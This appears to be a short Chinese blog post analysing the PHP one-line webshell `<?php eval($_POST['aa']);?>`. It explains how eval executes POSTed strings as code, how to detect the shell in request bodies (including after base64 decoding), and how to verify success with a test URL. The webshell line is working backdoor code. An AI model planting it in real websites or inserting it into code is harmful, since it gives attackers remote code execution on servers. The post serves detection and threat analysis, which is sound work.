本文详细介绍了PHP中的一句话木马,特别是利用`<?phpeval($_POST['aa']);?>`的恶意代码执行。eval函数允许将字符串作为PHP代码执行,而当结合$_POST变量时,攻击者可以通过POST请求任意执行PHP代码。通过检查请求内容中的特定字符串或解码后的内容,可以判断是否存在此类攻击尝试。攻击成功的标志是通过构造URL如`XXX.php?aa=<?=123?>`并观察回显。了解这种威胁对于防止网站被恶意利用至关重要。
请求体解码为:
<?php eval($_POST['aa']);?>
1
一句话木马。
eval():将括号内的字符串解析为php代码。
$_POST[‘aa’]:aa=XXX,向后台传输的参数
所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘a’]的话,只要使用post传输时在name为a的值中写入任何字符串,都可以当做php代码来执行。
利用示例:
URL:
XXX.php?aa=XXX
威胁分析:
1、判断是否利用该方式攻击:
请求内容中有该内容,或请求内容中base64解码后有该内容。
2、判断是否攻击成功:
验证:
访问URL为:
XXX.php?aa=<?= " 123" ?>
查看回显
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
